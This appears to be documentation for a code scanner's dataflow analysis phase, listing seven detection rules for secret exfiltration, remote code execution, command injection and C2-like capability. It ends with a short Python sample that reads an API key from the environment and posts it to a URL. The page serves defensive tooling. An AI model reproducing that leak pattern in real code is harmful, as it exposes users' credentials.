Pipeline · Phase 4
Behavioural Analysis — source → sink dataflow.
Phase 4 parses the file (Babel AST for JS/TS, regex extractors for the rest) and tracks how data flows from sources (env vars, file reads, network responses) to sinks (network sends, command exec, eval). Catches what regex misses — like a secret read in one statement that's exfiltrated in another.
| Property | Value |
|---|---|
| Latency | <200ms |
| Scope | Write / Edit · 6 languages |
| Engine | BehaviouralAnalyser · 7 dataflow rules |
| Score weight | scoring_weights.behavioural — default 2.0 (heaviest) |
| Short-circuit | any CRITICAL finding → deny immediately |
Languages
| Language | Parser | Extensions |
|---|---|---|
| JavaScript / TypeScript | Babel AST | .js .ts .jsx .tsx .mjs .cjs |
| Python | Regex | .py .pyw |
| Shell | Regex | .sh .bash .zsh .fish .ksh |
| Ruby | Regex | .rb .rake .gemspec |
| PHP | Regex | .php .phtml |
| Go | Regex | .go |
The 7 dataflow rules
| Rule | Severity | Detection |
|---|---|---|
DATAFLOW_EXFIL | CRIT | Secret or credential flows to a network sink |
DATAFLOW_RCE | CRIT | Network response flows to eval / exec |
DATAFLOW_CMD_INJECT | HIGH | User input flows to a command execution sink |
DATAFLOW_EVAL | HIGH | Data flows to eval / Function constructor |
CAPABILITY_C2 | HIGH | Skill/file has both exec + network capabilities |
CAPABILITY_EVAL | HIGH | Skill/file uses dynamic code evaluation |
CROSS_FILE_FLOW | MED | Data crosses file boundaries |
Why it's the heaviest weight
Dataflow tracking has very low false-positive rates compared to regex — a match means there's actually a path from a sensitive source to a dangerous sink in the parsed AST. That's why scoring_weights.behavioural defaults to 2.0 (vs 1.0 for runtime/static/llm). Turn it down only if you trust your code reviewers more than the analyser.
Example
# leak.py
key = os.environ["API_KEY"] # source
requests.post(url, data=key) # sink
DATAFLOW_EXFIL · 0.88